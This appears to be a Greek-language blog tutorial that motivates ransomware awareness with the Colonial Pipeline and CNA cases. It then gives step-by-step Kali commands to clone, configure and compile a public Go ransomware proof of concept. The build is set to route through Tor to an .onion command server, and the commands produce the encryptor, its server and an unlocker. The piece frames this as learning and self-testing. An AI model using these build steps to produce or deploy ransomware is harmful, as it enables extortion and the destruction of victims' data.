Το Ransomware εξελίσσεται ταχύτατα στη σημαντικότερη μορφή κακόβουλου λογισμικού που πλήττει τα ψηφιακά μας συστήματα. Οι εταιρείες σε όλο τον κόσμο πλήττονται από διάφορες μορφές κακόβουλου λογισμικού, συμπεριλαμβανομένης της νέας παραλλαγής, Snake, που έχει σχεδιαστεί ειδικά για συστήματα SCADA/ICS. Ο αγωγός Colonial Pipeline στις ΗΠΑ έκλεισε για σχεδόν μια εβδομάδα πριν πληρώσει λύτρα ύψους 5 εκατομμυρίων δολαρίων, γεγονός που καταδεικνύει τον κίνδυνο που ενέχει αυτό το ransomware για τα βιομηχανικά συστήματα και τις υποδομές ενός έθνους.
Πρόσφατα, η μεγάλη αμερικανική ασφαλιστική εταιρεία, η CNA, παραδέχθηκε ότι κατέβαλε λύτρα ύψους 40 εκατομμυρίων δολαρίων! Δεν είναι περίεργο που οι προγραμματιστές ransomware γίνονται όλο και πιο δημιουργικοί και κακόβουλοι, γιατί τα ransomware πληρώνουν!
Για να κατανοήσουμε καλύτερα πώς λειτουργεί το ransomware, ας δημιουργήσουμε το δικό μας ransomware από ένα Proof of Concept (POC) που είναι διαθέσιμο από τον mauri870 στο github.com. Ο ίδιος ανέπτυξε αυτό το ransomware στο πλαίσιο του ακαδημαϊκού του προγράμματος και δεν έχει σχεδιαστεί για κακόβουλους σκοπούς, αλλά μάλλον για να μας βοηθήσει να κατανοήσουμε πώς λειτουργεί το ransomware. Το κακόβουλο λογισμικό είναι γραμμένο σε Golang όπως και τα περισσότερα.
Κρυπτογραφεί τα αρχεία στο παρασκήνιο με AES-256-CTR και χρησιμοποιεί RSA-4096 για να εξασφαλίσει την ανταλλαγή δεδομένων με τον διακομιστή. Το συγκεκριμένο ransomware μοιάζει πολύ με το Cryptolocker, μία από τις πιο επιτυχημένες επιθέσεις ransomware στην ιστορία.
Table of Contents
Βήμα #1: Κατεβάστε και εγκαταστήστε τα Binaries
Το πρώτο βήμα είναι να ενεργοποιήσετε το Kali και να βεβαιωθείτε ότι η golang είναι εγκατεστημένη. Αν όχι, κατεβάστε το από τα αποθετήρια του Kali εισάγοντας,
kali > sudo apt install golang
Στη συνέχεια, θα πρέπει να συνδεθείτε ως χρήστης root.
kali > sudo su –
Τώρα δημιουργήστε έναν κατάλογο για τα binaries. Σε αυτή την περίπτωση, τον ονόμασα απλά “git”.
kali >mkdir git
Στη συνέχεια, αλλάξτε κατάλογο (cd) σε αυτόν τον κατάλογο.
kali > cd git
Έπειτα, κατεβάστε τα binaries από το github.
kali > git clone https://github.com/mauri870/ransomware
Βήμα #2: Εξαγωγή μεταβλητών περιβάλλοντος GO
Στη συνέχεια, πρέπει να ορίσουμε μερικές μεταβλητές περιβάλλοντος για να κατευθύνουμε τα binaries και το GO στους κατάλληλους καταλόγους.
Βήμα #3: Φτιάξτε τις εξαρτήσεις του πηγαίου κώδικα
Τώρα, με τις μεταβλητές ορισμένες και εξαγόμενες, πρέπει να δημιουργήσουμε τις εξαρτήσεις. Πλοηγηθείτε στο νέο κατάλογο, ransomware, και πληκτρολογήστε make deps.
kali > cd ransomware
kali > make deps
Βήμα #4: Φτιάξτε τον πηγαίο κώδικα με επιλογές
Τώρα που έχουμε ολοκληρώσει το deps make, μπορούμε να αρχίσουμε να φτιάχνουμε τον πηγαίο κώδικα. Στην περίπτωσή μας, θα χρησιμοποιήσουμε μερικές επιλογές.
Πρώτον, θέλουμε να χρησιμοποιήσουμε το ToR για να κρυπτογραφήσουμε τις επικοινωνίες μας μέσω του δικτύου ToR.
USE_TOR=true
Δεύτερον, θέλουμε να χρησιμοποιήσουμε τον dark web server μας στο iguru.onion (μπορείτε να χρησιμοποιήσετε οποιοδήποτε domain ή localhost).
SERVER_HOST=iguru.onion
Τρίτον, θέλουμε να χρησιμοποιήσουμε τη θύρα 80 (μπορείτε να χρησιμοποιήσετε οποιαδήποτε θύρα).
SERVER_PORT=80
Τέλος, θέλουμε να ορίσουμε το λειτουργικό σύστημα για τη μεταγλώττιση του πηγαίου κώδικα για το λειτουργικό μας σύστημα, στην προκειμένη περίπτωση το Linux.
GOOS=linux
Η εντολή μας θα πρέπει να μοιάζει κάπως έτσι,
kali > make -e USE_TOR=true SERVER_HOST=iguru.onion SERVER_PORT=80 GOOS=linux
Τέλος πατήστε ENTER και παρακολουθήστε τη σύνταξη του ransomware σας.
Βήμα #5: Ελέγξτε τον κατάλογο για το ransomware.exe
Μόλις δημιουργηθεί ο πηγαίος κώδικας, δείτε τη λίστα στον κατάλογο του ransomware.
kali > ls -l
Τώρα, πλοηγηθείτε στον κατάλογο bin.
kali > cd bin
Εδώ, θα δείτε το ransomware.exe, τον διακομιστή και το unlocker.exe.
Βήμα #6: Εξετάστε τους τύπους αρχείων προς κρυπτογράφηση
Αν θέλετε να δείτε ποιους τύπους αρχείων θα κρυπτογραφήσει το ransomware, μεταβείτε στον κατάλογο cmd και ανοίξτε το common.go
kali > cd cmd
kali > more common.go
Εδώ, μπορείτε να δείτε τις επεκτάσεις αρχείων που το ransomware στοχεύει να κρυπτογραφήσει όταν εκτελεστεί.
Σύνοψη
Το Ransomware είναι ίσως η μεγαλύτερη απειλή για τα ψηφιακά μας συστήματα αυτή τη στιγμή. Όπως έδειξε ξεκάθαρα η επίθεση στον αγωγό Colonial Pipeline, σχεδόν όλοι είναι ευάλωτοι και αν παραβιαστούν τα συστήματα SCADA/ICS μπορεί να υπάρξουν σημαντικές οικονομικές επιπτώσεις και επιπτώσεις στις υποδομές!
Αυτό το ransomware POC θα σας βοηθήσει να κατανοήσετε καλύτερα το ransomware ως απειλή και να ελέγξετε αν τα συστήματά σας είναι ευάλωτα σε μια τέτοια επίθεση.
Στο δεύτερο μέρος αυτής της σειράς, θα δοκιμάσουμε αυτό το ransomware σε ένα Windows VM.